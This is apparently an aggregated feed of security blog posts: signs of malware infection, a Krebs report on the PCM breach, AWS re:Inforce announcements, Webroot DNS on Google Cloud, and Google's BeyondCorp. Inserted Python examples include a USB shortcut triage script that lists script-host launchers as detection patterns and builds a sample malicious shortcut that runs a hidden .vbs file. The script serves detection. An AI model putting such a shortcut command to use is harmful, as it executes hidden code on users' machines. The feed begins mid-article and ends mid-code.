This triggers the unwanted software to download and install on your device. The effects are not only annoying but also malicious and can compromise your data.

What to do?

You can always manually change your homepage address from your browser’s settings.

But the actual cause of this behavior can be, unfortunately, rooted much deeper, and be a sign of a more serious malware infection.

So, the best way to avoid compromising your files, passwords, and payment details is by using a complete, next-gen threat prevention and mitigation security solution.


I just learned to easily detect malware infection on my PC.
Click To Tweet


Scenario #7: “My PC is acting weird because I get unusual messages that appear unexpectedly.”

That’s usually the type of warning message that makes you wonder “What’s going on with my computer?”

Here are some frequent warning signs to watch out for:

  • Suddenly, you see programs opening and closing automatically.
  • Your Windows OS is shutting down unexpectedly, without any reason.
  • You’ve noticed strange windows showing up when your PC tries to boot.
  • Windows tells you that you’ve lost access to some of your drives.

Although the root cause may be a technical issue, it could also be a warning sign that malware has taken over your computer and is slowing down its activity.

How to mitigate the impact of a malware infection?

Follow these steps:

  1. Keep your Windows system up to date.
  2. Use an anti-malware solution that doesn’t give threats the chance to enter your computer.
  3. Consider reinstalling your operating system. This 13-step guide will show you how to secure your PC after a fresh (re)installation.

Scenario #8: “I use an antivirus product and keep getting the message that <Protection is disabled>.”

If you noticed that your antivirus solution doesn’t seem to work anymore or that its Update module is disabled, you should immediately look for ways to fix this.

Did you know that some types of malware are sneaky and can disable your security solution?

Well, yes, they are designed to leave users without any defense and make it difficult to detect them.

If you have already tried rebooting your computer and closing and reopening the security solution, and all your troubleshooting efforts seem useless, you should consider the malware infection scenario.

This is especially the case because it’s a known fact that traditional antivirus solutions can’t easily detect, block or remove next-gen and advanced malware (such as ransomware, adware or financial malware).

Thus, you can get exposed to all kind of attacks, and we strongly recommend enhancing your protection by adding multiple layers of protection.

Read these 10 reasons why second-generation malware evades antivirus detection.

Scenario #9: “My friends tell me they’re getting strange random messages from me on Facebook, which I didn’t send.”

If your friends recently got several strange messages/emails or suspicious links from you, and you didn’t send them, it’s likely that you’ve been infected with malware.

Here’s a good example of malware spreading via Facebook Messenger and tricking users into clicking on links they’ve received from one of their friends.

But first, check out your online accounts and see if those random messages were actually sent from one of your accounts. If something like this happened, take immediate action by following these security measures:

  • Log out from all your accounts. For most of our online accounts, we log into multiple devices and we often forget to log out. So make sure to log out from your online accounts on all connected devices.
  • Use unique and strong passwords for all your online accounts. Always remember to change passwords! NEVER use the same password(s) for multiple accounts, because if you are hacked, all of them will be exposed and your valuable data will get stolen. This password security guide will help you master passwords like an expert.
  • Start using two-factor authentication RIGHT NOW. Do you want to increase your control over your accounts’ security? Then add this second security layer that will ask for an extra authentication step in the login process, along with your credentials.

Scenario #10: “There are these new, yet unfamiliar icons on my desktop that I don’t recognize.”

If you’ve been noticing new, unknown icons on your PC, you most likely downloaded sneaky programs called PUPs (Potentially Unwanted Programs) by accident. They are malicious programs that can do a lot of damage, exposing you to data leakage, displaying annoying ads or pop-ups on the screen, or adding toolbars to your browser.

They often come together with suspicious software you’ve ended up installing. You may have accidentally given your consent to install additional tools which you didn’t notice were there.

But while good Internet practices can protect you against PUPs, it’s advisable to rely on proactive security software.

Scenario #11: “Sometimes, I see unusual error messages displayed on my computer.”

An error message like this one could indicate that there’s a bug in your system which needs to be fixed. Or it could be a warning sign of malware infection.

These types of error messages showing missing or corrupt file folders suggest that your PC has been compromised and its performance is affected.

Source: Microsoft Windows Dev Center

How to fix this:

  • Make sure you have the latest updates installed on your operating system and regularly check for security patches, applications patches, and drivers.
  • Use a next-gen anti-malware solution, designed to keep you safe from any unwanted threats.

Scenario #12: “It seems that I can’t access my Control Panel by clicking on the button.”

If you are facing this issue and your Control Panel does not open, it means that your computer is having a technical problem and is not functioning correctly.

How to fix this?

  • The first thing to do is to run a full scan of your PC.
  • Then, see if you can open the Control Panel in Safe Mode and follow the steps described here. It could also be another sign that your computer is vulnerable and exposed to potential cyber attacks. After running a full scan with your antivirus product, also use a proactive security solution to keep your confidential information safe.

Scenario #13: “Everything seems to work perfectly on my PC. Is there any reason to be paranoid and still check for malware?”

When it comes to data protection, it is essential to be a little bit paranoid and very careful, even if everything seems to look normal. Why? Because cybercriminals are creative and they can hide malware in the most unexpected places, leaving no visible marks and still infecting your computer.

Everything may seem to work perfectly normally on your PC while a bot on your system silently waits for instructions to access and collect your most valuable data.

The best way to make sure no malware is taking over your system is to install a security solution that scans your machine in real time and stops threats before they touch your PC.

Scenario #14: “My laptop is working very slowly and sometimes it gives the <Flash not working> error in the browser.”

We received the above message from one of our readers.

If you get this message too on your PC, it might be a good idea to disable Flash and try another alternative. Flash has lots of vulnerabilities that we talked about before.

Regardless of the browser you are using, Firefox included, this could be a warning sign that your computer is malware-infected.

Here are a few useful tips that will come in handy: 

  • Keep your Windows system up to date and consider reinstalling your OS if this issue persists.
  • Do a full scan of all your files and apps installed on your PC using an AV solution, to see if it detects any malware.
  • Consider installing a proactive security solution to enhance protection for your computer and keep malware and other online threats at bay.
  • Also, make sure you reboot your PC if you haven’t performed this task in a while.
  • Have a look at the Task Manager and see what programs run in the background that could slow down your PC’s performance. It gives you an overview of which apps and programs take up resources, and how much.
  • Make sure you have the latest version of Adobe Flash installed, but if you don’t have it, download it from here and follow the instructions. Remember to restart the computer after this procedure.
  • If you no longer want to have Flash Player on your computer, you can follow these easy steps and uninstall it.

Scenario #15: “I used an external USB drive and when I connected it to my computer, it was infected by a virus and suddenly all the files turned into shortcuts.”  

Here’s another warning sign showing your computer could be infected with malware. If you used an external USB drive or another external flash drive to copy information without scanning it before, this could explain the appearance of those shortcut files.

If all your images, files, and other documents show up as shortcut files and are not accessible, they could be infected with malware. These malicious files can compromise all your data from the computer, rename your files and create a lot of chaos and hassle.

How to fix this? 

If your files have been compromised, here are some useful tips and security measures to take:

  • Do a full scan of your USB drive and check for possible viruses and malware. If the antivirus solution doesn’t detect them on your external drive, you should format it and clean the space.
  • Use the Command Prompt (cmd) on a Windows machine while the USB drive is plugged into your device. To access it, go to the Start menu, type “cmd”, press Enter, and you’ll see “cmd.exe” in the list of programs. Click on it and you will be taken to the Windows command line, from where you can recover the virus-infected. The process may take a while, but it will clean up your computer.
  • Make sure you add multiple layers of security and consider using a proactive security solution to strengthen your protection.
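Scenario #15 can be triaged with a script instead of by eye. The following is an added example and not part of the original article: it reads the StringData section of each .lnk on a mounted drive (per the MS-SHLLINK format), flags shortcuts whose target is a script host or whose arguments name script files, and notes when a shortcut's name does not match what it opens. The drive path, the two sample shortcuts and the `hidden\run.vbs` name inside them are constructed for the demonstration.

```python
from __future__ import annotations

import os
import struct

# Shell Link (.lnk) header constants from the MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
HAS_RELATIVE_PATH, HAS_ARGUMENTS = 0x08, 0x20
# StringData fields in file order, each with the LinkFlags bit that makes it present.
STRING_FIELDS = (("name", 0x04), ("relative_path", HAS_RELATIVE_PATH), ("working_dir", 0x10),
                 ("arguments", HAS_ARGUMENTS), ("icon", 0x40))
# A shortcut standing in for "Holiday photos" has no business opening a script
# host; these names and extensions drive the heuristics below.
LAUNCHERS = ("cmd", "wscript", "cscript", "powershell", "mshta", "rundll32")
SCRIPT_EXTS = (".vbs", ".js", ".jse", ".wsf", ".bat", ".cmd", ".ps1", ".exe", ".scr")


def parse_lnk(data: bytes) -> dict[str, str]:
    """Return the StringData fields of a .lnk. IDList and LinkInfo are skipped via
    their own size fields, which is all a triage pass needs."""
    if len(data) < 76 or data[:4] != b"L\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize excludes itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    info = {name: "" for name, _ in STRING_FIELDS}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]     # CountCharacters
        raw = data[pos + 2:pos + 2 + count * width]
        pos += 2 + count * width
        info[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
    return info


def suspicious_reasons(lnk_name: str, info: dict[str, str]) -> list[str]:
    """Heuristics for a shortcut that has replaced a user's file on a drive."""
    reasons = []
    target = os.path.basename(info["relative_path"].replace("\\", "/")).lower()
    stem = target.rsplit(".", 1)[0]
    if stem in LAUNCHERS:
        reasons.append(f"opens a script host or launcher: {target}")
    run = [t for t in info["arguments"].lower().replace('"', " ").split()
           if t.endswith(SCRIPT_EXTS)]
    if run:
        reasons.append("arguments execute: " + ", ".join(run))
    # A name mismatch alone is weak ("Word.lnk" -> WINWORD.EXE is normal); it is
    # reported so the analyst can weigh it together with the two signals above.
    expected = lnk_name[:-4].lower() if lnk_name.lower().endswith(".lnk") else lnk_name.lower()
    if target and expected not in (target, stem):
        reasons.append(f"named {lnk_name!r} but points at {target!r}")
    return reasons


def triage_drive(root: str) -> dict[str, list[str]]:
    """Walk a mounted drive (e.g. 'E:\\') and report every .lnk with findings."""
    findings: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in (f for f in files if f.lower().endswith(".lnk")):
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    reasons = suspicious_reasons(fn, parse_lnk(fh.read()))
            except (OSError, ValueError) as exc:
                reasons = [f"unreadable: {exc}"]
            if reasons:
                findings[path] = reasons
    return findings


def build_lnk(relative_path: str, arguments: str = "") -> bytes:
    """Constructed sample: a minimal .lnk carrying only StringData."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    strings = [relative_path] + ([arguments] if arguments else [])
    return header + b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                             for s in strings)


# Constructed samples: one mimicking an infected drive, one an ordinary shortcut.
SAMPLE_BAD = ("Holiday photos.lnk", build_lnk(
    "..\\..\\Windows\\System32\\cmd.exe", '/c start hidden\\run.vbs & start "Holiday photos"'))
SAMPLE_OK = ("Budget.xlsx.lnk", build_lnk("..\\Documents\\Budget.xlsx"))

if __name__ == "__main__":
    import sys
    report = (triage_drive(sys.argv[1]) if len(sys.argv) > 1
              else {n: suspicious_reasons(n, parse_lnk(b)) for n, b in (SAMPLE_BAD, SAMPLE_OK)})
    for path, reasons in report.items():
        print(path, *(["  - " + r for r in reasons] or ["  (no findings)"]), sep="\n")
```

Saved as, say, `triage_lnk.py`, run it as `python triage_lnk.py E:\` against the mounted drive; without an argument it reports on the two constructed samples.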

Can you avoid malware infections?

Yes, you definitely can, if you’re paying close attention to these early malware infection signs and prevent them from happening.

Make sure your operating system, browsers, and plugins are always up to date because keeping your software patched can keep online criminals at bay.

Also, here’s a list of recommended articles to help you better survive a malware infection:

How to Easily Remove Malware from Your PC [Updated]

How to Protect Your PC with Multiple Layers of Security

32 Go-To Security Forums for Free Malware Removal Help

Make sure your network is safe and secure, and always think before you click on something. Also, remember to practice safe browsing and always access trusted online sources to easier prevent potential online threats.

Reminder: Knowledge and long-lasting education are our best weapons to fight against online threats, so it’s vital to learn and educate yourself and others to better understand how malware works on your system, and how you can mitigate its impact.

This article was originally published by Andra Zaharia in April 2016, updated by Ioana Rijnetu in December 2018, and edited by Bianca Soare in June 2019.

The post 13+ Warning Signs that Your Computer is Malware-Infected [Updated 2019] appeared first on Heimdal Security Blog.

Weekly Update 145

Something totally new this week - Israel! I spent the week in Tel Aviv at Cyber Week, a massive infosec conference where I shared the keynote stage with an amazing array of speakers including many from three letter acronym departments and even PM Benjamin Netanyahu. It's funny how on the one hand an event like this can be so completely different to the very familiar NDC Oslo scene I was in just last week yet by the same token, I'm up there talking about all the same stuff and doing my usual thing.

This week, I'm talking about Israel, the Cyber Week event and how things are tracking with Project Svalbard (spoiler - bloody busy!). I also get a ticket from traffic cops for riding an electric scooter on a footpath so yeah, that's a new one for me...

References

  1. I spent an afternoon in Jerusalem (link through to my Facebook pics, what an amazing place...)
  2. Plus, the better part of 4 days in Tel Aviv (posted more pics on the way to the airport at stupid o'clock this morning)
  3. TripAdvisor has been resetting a bunch of customers' passwords when found in a data breach (precisely what Scott and I were talking about last week in terms of many other companies proactively using breach data)
  4. strongDM is this week's blog sponsor (Use your SSO to grant or revoke access to any database, server, or k8s)

Senate Republicans Block Election Security Bill

A bill that would provide a billion dollars to states for election security was blocked by Senate Republicans.

The Election Security Act, proposed by presidential candidate Senator Amy Klobuchar (D-Minn.), would have required paper ballots for voting systems and required President Trump to provide a strategy for protecting institutions from foreign cyberattacks.

“There is a presidential election before us and if a few counties in one swing state or an entire state get hacked into there’s no backup paper ballots and we can’t figure out what happened, the entire election will be called into question,” said Klobuchar.

Senator James Lankford (R-Okla.), who has worked with Klobuchar on previous election security efforts, voted to stop the bill, arguing that federal funding couldn’t be effectively implemented in time for the 2020 elections. 

“No matter how much money we threw at the states right now, they could not make that so by the 2020 presidential election,” Lankford said. 

Calls for legislation to secure elections have been renewed in the wake of the redacted release of the Mueller report, which detailed Russian interference in 2016. While several bills have passed the House of Representatives, many have been blocked in the Republican-controlled Senate, particularly by Majority Leader Mitch McConnell. 

The post Senate Republicans Block Election Security Bill appeared first on Adam Levin.

AWS re:Inforce 2019 re:Cap

A wide angle shot of the conference registration desk for AWS re:Inforce with an endcap wall in a slight teal blue saying, "Welcome to AWS re:Inforce"

The inaugural AWS Cloud security conference—AWS re:Inforce—was held in Boston this week. Well over 8,000 attendees descended on the Boston Convention and Exhibition Center for two days jam-packed with security education and cloud content.

This was a very interesting conference because the dynamics of the attendees felt very different from typical AWS events. Usually at an AWS event, security teams are the odd people out, making up a small portion of the attendees. At re:Inforce, the script flipped and it seemed that the majority of attendees were primarily in security roles.

That’s great news for the show and for the community in general. Everyone in attendance and online was eager to learn about AWS Security Services, offers from AWS APN Partners, and what works—and what doesn’t—when it comes to securing cloud deployments.

https://www.youtube.com/watch?v=FKphJNfpWk8

Announcements

As with any AWS event, there were a number of announcements that covered new features and functionality. We didn’t get any new services but the size of these features makes up for that. Here’s my quick take on each of the major announcements and how it might be useful for you.

AWS Security Hub Goes GA

AWS Security Hub was first announced as a preview at AWS re:Invent 2018. This tool helps consolidate security information into one place. Data from various AWS Security Services (like Amazon GuardDuty, Amazon Macie, and Amazon Inspector) and from various AWS APN Partners feeds into Security Hub in order to highlight compliance issues and various security findings.

That term is key. A finding isn’t a log entry or an event or even an incident (as defined in infosec). A finding is generated by one of the security tools and is likely to start a security or compliance incident.

The goal of Security Hub is to make security data more visible and actionable. It is not a replacement for a SIEM or a team of analysts. It is a fantastic tool for highlighting security issues to other teams.

Read more from Brandon West over on the AWS Blog.

AWS Control Tower Comes Out Of Preview

This service helps you create strong, well-architected baselines for new AWS accounts within your organization. Control Tower works with landing zones, a concept first brought to the forefront at AWS re:Invent 2018.

Multi-account strategies are common within larger organizations, and there are a number of security benefits to the approach if it is well managed. The challenge is standardizing settings, configuration, and policy across accounts.

This is where AWS Control Tower comes into the picture. Working with AWS Organizations, AWS IAM, AWS Config, AWS CloudTrail, and AWS Service Catalog, you can configure what every new account within your organization should look like. This helps ensure that all of your teams are set up for success.

Read more from Jeff Barr.

VPC Traffic Mirroring

Up until now, you’ve only been able to glimpse what’s going on with the network traffic in your VPC using AWS native features. VPC Flow Logs provide the basics of source, destination, and size of traffic, but actual packet analysis requires a richer source than flow records.

VPC Traffic Mirroring does exactly as promised, using the AWS network layer to copy the traffic selected by mirror sessions and filters to a target where another tool can analyze it.

This can be helpful in network forensic analysis, troubleshooting, or operational analysis.
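To make the target/filter/session model concrete, here is an added example (not from the recap or from AWS) that wires up one mirror with boto3: the sensor ENI becomes the target, a filter accepts only the inbound and outbound halves of HTTPS sessions, and a session binds them to the monitored ENI. The boto3 method and parameter names are those of the EC2 API; the ENI identifiers, the VNI and the RecordingEC2 stand-in are constructed so the flow runs offline.

```python
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class MirrorRule:
    """One accept rule; `port` is the service port on the mirrored instance."""
    direction: str                 # "ingress" (into the source ENI) or "egress"
    protocol: int                  # IANA protocol number: 6 = TCP, 17 = UDP
    port: int
    peer_cidr: str = "0.0.0.0/0"   # the remote side of the conversation


def setup_mirroring(ec2, source_eni: str, target_eni: str, rules: list[MirrorRule],
                    session_number: int = 1, vni: int = 1234,
                    packet_length: int | None = None) -> dict[str, str]:
    """Create target -> filter -> rules -> session, the four resources behind one
    mirror.  `ec2` is a boto3 EC2 client (or any object with the same methods)."""
    if not 1 <= session_number <= 32766:
        raise ValueError("SessionNumber must be in 1..32766")
    if not rules:
        raise ValueError("a filter with no rules mirrors nothing")
    target = ec2.create_traffic_mirror_target(
        NetworkInterfaceId=target_eni, Description="sensor ENI (constructed)")
    target_id = target["TrafficMirrorTarget"]["TrafficMirrorTargetId"]
    filt = ec2.create_traffic_mirror_filter(Description="selected services only")
    filter_id = filt["TrafficMirrorFilter"]["TrafficMirrorFilterId"]
    for n, rule in enumerate(rules, start=1):
        if rule.direction not in ("ingress", "egress"):
            raise ValueError(f"bad direction {rule.direction!r}")
        port_range = {"FromPort": rule.port, "ToPort": rule.port}
        # Direction is relative to the source ENI: inbound requests carry the
        # service port as destination, outbound replies carry it as source.
        if rule.direction == "ingress":
            ends = {"DestinationPortRange": port_range, "SourceCidrBlock": rule.peer_cidr,
                    "DestinationCidrBlock": "0.0.0.0/0"}
        else:
            ends = {"SourcePortRange": port_range, "SourceCidrBlock": "0.0.0.0/0",
                    "DestinationCidrBlock": rule.peer_cidr}
        ec2.create_traffic_mirror_filter_rule(
            TrafficMirrorFilterId=filter_id, TrafficDirection=rule.direction,
            RuleNumber=100 * n, RuleAction="accept", Protocol=rule.protocol, **ends)
    kwargs = dict(NetworkInterfaceId=source_eni, TrafficMirrorTargetId=target_id,
                  TrafficMirrorFilterId=filter_id, SessionNumber=session_number,
                  VirtualNetworkId=vni)
    if packet_length is not None:          # leave unset to mirror whole packets
        kwargs["PacketLength"] = packet_length
    session = ec2.create_traffic_mirror_session(**kwargs)
    return {"target": target_id, "filter": filter_id,
            "session": session["TrafficMirrorSession"]["TrafficMirrorSessionId"]}


class RecordingEC2:
    """Constructed stand-in for the boto3 EC2 client so the flow runs offline:
    it records each call and returns placeholder IDs shaped like real responses."""

    def __init__(self) -> None:
        self.calls: list[tuple[str, dict]] = []

    def __getattr__(self, method: str):
        def call(**kwargs):
            self.calls.append((method, kwargs))
            kind = method[len("create_"):]                            # traffic_mirror_target
            key = "".join(part.title() for part in kind.split("_"))   # TrafficMirrorTarget
            return {key: {key + "Id": f"{kind}-{len(self.calls):04d}"}}
        return call


if __name__ == "__main__":
    ec2 = RecordingEC2()   # swap for boto3.client("ec2") to create the real resources
    https_both_ways = [MirrorRule("ingress", 6, 443), MirrorRule("egress", 6, 443)]
    print(setup_mirroring(ec2, "eni-0123source", "eni-0123sensor", https_both_ways))
    for method, params in ec2.calls:
        print(method, params)
```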

Jeff Barr has a walk through of the feature on the AWS Blog.

AWS Incident Response Whitepaper

Though published a few weeks before the event, AWS is highlighting the new AWS Security Incident Response Whitepaper. This paper helps security teams understand how traditional incident response maps to the AWS Cloud.

It’s a well-written, practical paper that can help teams understand how a process they are familiar with changes in a new environment like the AWS Cloud.

Get an overview from Joshua Du Lac over on the AWS Security Blog.

AWS Marketplace Procurement System Integration

During the AWS re:Inforce keynote, Stephen Schmidt announced a new AWS Marketplace integration for existing procurement systems. At first blush, this seems like an odd feature to call out at a security conference.

But security is always a critical question in any enterprise sales engagement and procurement headaches abound. The AWS Marketplace can address some of those headaches.

This new integration (initially with Coupa and others via cXML) will make it easier for some enterprises to test and acquire new technologies, reducing the barrier to acquire new security tools.

Read more in the AWS Marketplace documentation.

What’s Next

At the end of the keynote, Stephen Schmidt announced that AWS re:Inforce will be held again next year, this time in Houston. That’s fantastic news, as it shows that AWS acknowledges that security is a critical pillar of well-built cloud deployments and that the community is strong enough to support events of this size dedicated to the topic.

The breakout sessions from the show were recorded and are being posted to the AWS YouTube channel; the day 1 keynote by AWS CISO Stephen Schmidt has already been posted, so you can start catching up now.

I did a takeover of the Trend Micro LinkedIn page and went live twice during the show. Check that out for a bit of an insider’s view and—as always—ping me on Twitter, where I’m @marknca, to talk more about this and cloud security in general.


Webroot DNS Protection: Now Leveraging the Google Cloud Platform

We are excited to announce Webroot® DNS Protection now runs on Google Cloud Platform (GCP). Leveraging GCP in this way will provide Webroot customers with security, performance, and reliability.

Security

Preventing denial of service (DoS) attacks is a core benefit of Webroot DNS Protection. Now, the solution benefits from Google Cloud load balancers with built-in DoS protection and mitigation, enabling the prevention of attack traffic before it ever hits the agent core. 

“The big thing about Google Cloud is that it dynamically manages denial of service (DoS) attacks,” said Webroot Sales Engineer Jonathan Barnett. “That happens automatically, and we know Google has that figured out.”

Click here to learn why businesses need DNS protection.

Performance

With this release, Webroot DNS Protection now runs on the Google Cloud’s high-redundancy, low-latency networks in 16 regions worldwide. That means there’s no need for a Webroot customer in Australia to have a DNS request resolved in Los Angeles, when more convenient infrastructure exists close by.  

“Google Cloud provides the ability to scale by adding new regions or new servers whenever necessary as load or need determines, nationally or internationally,” said Barnett. “This allows us to provide geolocation-appropriate answers for our customers, maximizing performance.”

Reliability

Because of GCP’s global infrastructure footprint, Webroot can quickly and easily provision more of Google’s servers in any region to ensure latency times remain low. 

And because those regional deployments can be programmed to auto-scale with spikes in traffic, even drastically increasing loads won’t increase wait times for requests.

According to Barnett, “Even if Webroot were to take on a large number of customers in a short time period, say with the closing of a deal to offer DNS solutions to an enterprise-level client with a number of subsidiaries, our environments would automatically scale with the additional load.”

One more note on the release 

Another key feature of the April DNS agent update is switching communications from port 53, which is typically associated with DNS requests, to port 443, which is more commonly associated with HTTPS (SSL/TLS) traffic.

The reason for this change is that, given port 443’s relevance to routine requests like banking sites and those accepting payment information, it is rarely constrained, modified, or controlled. This will reduce the need to configure firewalls or make other admin adjustments in order for Webroot DNS Protection to function as intended. 

It’s good to be in good company

With Webroot DNS Protection now leveraging GCP, your network-level protection gains fewer outages, lower latency, and fewer bottlenecks. Ready to experience Webroot DNS Protection for yourself? Try it free for 30 days here.

The post Webroot DNS Protection: Now Leveraging the Google Cloud Platform appeared first on Webroot Blog.

Breach at Cloud Solution Provider PCM Inc.

A digital intrusion at PCM Inc., a major U.S.-based cloud solution provider, allowed hackers to access email and file sharing systems for some of the company’s clients, KrebsOnSecurity has learned.

El Segundo, Calif.-based PCM [NASDAQ:PCMI] is a provider of technology products, services and solutions to businesses as well as state and federal governments. PCM has nearly 4,000 employees, more than 2,000 customers, and generated approximately $2.2 billion in revenue in 2018.

Sources say PCM discovered the intrusion in mid-May 2019. Those sources say the attackers stole administrative credentials that PCM uses to manage client accounts within Office 365, a cloud-based file and email sharing service run by Microsoft Corp.

One security expert at a PCM customer who was recently notified about the incident said the intruders appeared primarily interested in stealing information that could be used to conduct gift card fraud at various retailers and financial institutions.

In that respect, the motivations of the attackers seem similar to the goals of intruders who breached Indian IT outsourcing giant Wipro Ltd. earlier this year. In April, KrebsOnSecurity broke the news that the Wipro intruders appeared to be after anything they could quickly turn into cash, and used their access to harvest gift card information from a number of the company’s customers.

It’s unclear whether PCM was a follow-on victim from the Wipro breach, or if it was attacked separately. As noted in that April story, PCM was one of the companies targeted by the same hacking group that compromised Wipro.

The intruders who hacked into Wipro set up a number of domains that appeared visually similar to that of Wipro customers, and many of those customers responded to the April Wipro breach story with additional information about those attacks.

PCM never did respond to requests for comment on that story. But in a statement shared with KrebsOnSecurity today, PCM said the company “recently experienced a cyber incident that impacted certain of its systems.”

“From its investigation, impact to its systems was limited and the matter has been remediated,” the statement reads. “The incident did not impact all of PCM customers; in fact, investigation has revealed minimal-to-no impact to PCM customers. To the extent any PCM customers were potentially impacted by the incident, those PCM customers have been made aware of the incident and PCM worked with them to address any concerns they had.”

On June 24, PCM announced it was in the process of being acquired by global IT provider Insight Enterprises [NASDAQ:NSIT]. Insight has not yet responded to requests for comment.

Earlier this week, cyber intelligence firm RiskIQ published a lengthy analysis of the hacking group that targeted Wipro, among many other companies. RiskIQ says this group has been active since at least 2016, and posits that the hackers may be targeting gift card providers because they provide access to liquid assets outside of the traditional western financial system.

The breach at PCM is just the latest example of how cybercriminals increasingly are targeting employees who work at cloud data providers and technology consultancies that manage vast IT resources for many clients. On Wednesday, Reuters published a lengthy story on “Cloud Hopper,” the nickname given to a network of Chinese cyber spies that hacked into eight of the world’s biggest IT suppliers between 2014 and 2017.

How Google adopted BeyondCorp


It's been almost five years since we released the first of multiple BeyondCorp papers, describing the motivation and design principles that eliminated network-based trust from our internal networks. With that anniversary looming and many organizations actively working to adopt models like BeyondCorp (which has also become known as Zero Trust in the industry), we thought it would be a good time to revisit topics we have previously explored in those papers, share the lessons that we have learned over the years, and describe where BeyondCorp is going as businesses move to the cloud.

This is the first post in a series that will focus on Google’s internal implementation of BeyondCorp, providing necessary context for how Google adopted BeyondCorp.

Why did we adopt BeyondCorp?

With a traditional enterprise perimeter security model, access to services and resources is provided by a device being connected to a privileged network. If an employee is in a corporate office, on the right network, services are directly accessible. If they're outside the office, at home or in a coffee shop, they frequently use a VPN to get access to services behind the enterprise firewall. This is the way most organizations protect themselves.

By 2011, it became clear to Google that this model was problematic, and we needed to rethink how enterprise services are accessed and protected for the following reasons:

Improving productivity
  • A growing number of employees were not in the office at all times. They were working from home, a coffee shop, a hotel or even on a bus or airplane. When they were outside the office, they needed to connect via a VPN, creating friction and extending the network perimeter.
  • The user experience of a VPN client may be acceptable, even if suboptimal, from a laptop. Use of a VPN is less acceptable, from both the employee and the admin perspective, given the growing use of devices such as smartphones and tablets to perform work.
  • A number of users were contractors or other partners who only needed selective access to some of our internal resources, even though they were working in the office.
Keeping Google secure
  • The expanded use of public clouds and software-as-a-service (SaaS) apps meant that some of our corporate services were no longer deployed on-premises, further blurring the traditional perimeter and trust domain. This introduced new attack vectors that needed to be protected against.
  • There was ongoing concern about relying solely on perimeter defense, especially when the perimeter was growing consistently. With the proliferation of laptops and mobile devices, vulnerable and compromised devices were regularly brought within the perimeter.
  • Finally, if a vulnerability was observed or an attack did happen, we wanted the ability to respond as quickly and automatically as possible.

How did we do it?

In order to address these challenges, we implemented a new approach that we called BeyondCorp. Our mission was to have every Google employee work successfully from untrusted networks on a variety of devices without using a client-side VPN. BeyondCorp has three core principles:
  • Connecting from a particular network does not determine which service you can access.
  • Access to services is granted based on what the infrastructure knows about you and your device.
  • All access to services must be authenticated, authorized and encrypted for every request (not just the initial access).


High level architecture for BeyondCorp

BeyondCorp gave us the security that we were looking for along with the user experience that made our employees more productive inside and outside the office.
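The three principles above, as an added example that is not Google's code: a small access-proxy policy that decides each request from what the infrastructure knows about the user and the device, re-derives trust on every call, and never consults the source network. The trust tiers, resource policy, inventory freshness window and scenario records are constructed for illustration.

```python
"""Per-request access decision in the BeyondCorp style.

Added example (not Google's code): a small access-proxy policy that ignores
the source network and decides from what the infrastructure knows about the
user and the device, re-evaluated on every request. Tier names, the resource
policy and the inventory records are constructed for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class Device:
    device_id: str
    managed: bool             # enrolled in the corporate device inventory
    disk_encrypted: bool
    os_patch_age_days: int    # days since the last OS security update
    inventory_seen: datetime  # when inventory last confirmed this state


@dataclass(frozen=True)
class User:
    username: str
    groups: frozenset
    mfa_verified: bool        # strong authentication completed for this request


@dataclass(frozen=True)
class Request:
    user: User
    device: Device
    resource: str
    source_network: str       # logged for audit only; never part of the decision
    now: datetime


# Constructed trust tiers (not Google's real tiers)
UNTRUSTED, BASIC, FULL = 0, 1, 2
MAX_INVENTORY_AGE = timedelta(hours=24)

# Constructed resource policy: minimum device tier and required group
POLICY = {
    "wiki": {"tier": BASIC, "group": "employees"},
    "source-repo": {"tier": FULL, "group": "engineering"},
    "payroll": {"tier": FULL, "group": "finance"},
}


def device_tier(dev, now):
    """Derive a trust tier from device state; stale inventory data grants nothing."""
    if now - dev.inventory_seen > MAX_INVENTORY_AGE:
        return UNTRUSTED  # data-quality rule: unknown state means no trust
    if not dev.managed or not dev.disk_encrypted:
        return UNTRUSTED
    if dev.os_patch_age_days > 30:
        return BASIC
    return FULL


def decide(req):
    """Return (allowed, reason). Trust is re-derived on every call, never cached."""
    policy = POLICY.get(req.resource)
    if policy is None:
        return False, "unknown resource"
    if not req.user.mfa_verified:
        return False, "authentication incomplete"
    tier = device_tier(req.device, req.now)
    if tier < policy["tier"]:
        return False, "device tier %d below required %d" % (tier, policy["tier"])
    if policy["group"] not in req.user.groups:
        return False, "user not in %s" % policy["group"]
    return True, "ok"


def sample_decisions():
    """Constructed scenarios; the same device gets the same answer from any network."""
    now = datetime(2019, 7, 1, tzinfo=timezone.utc)
    alice = User("alice", frozenset({"employees", "engineering"}), True)
    healthy = Device("laptop-1", True, True, 5, now - timedelta(hours=1))
    unpatched = Device("laptop-2", True, True, 45, now - timedelta(hours=2))
    stale = Device("laptop-1", True, True, 5, now - timedelta(days=3))
    return {
        "office": decide(Request(alice, healthy, "source-repo", "corp-office-lan", now)),
        "cafe": decide(Request(alice, healthy, "source-repo", "coffee-shop-wifi", now)),
        "unpatched-wiki": decide(Request(alice, unpatched, "wiki", "corp-office-lan", now)),
        "unpatched-repo": decide(Request(alice, unpatched, "source-repo", "corp-office-lan", now)),
        "stale-inventory": decide(Request(alice, stale, "wiki", "corp-office-lan", now)),
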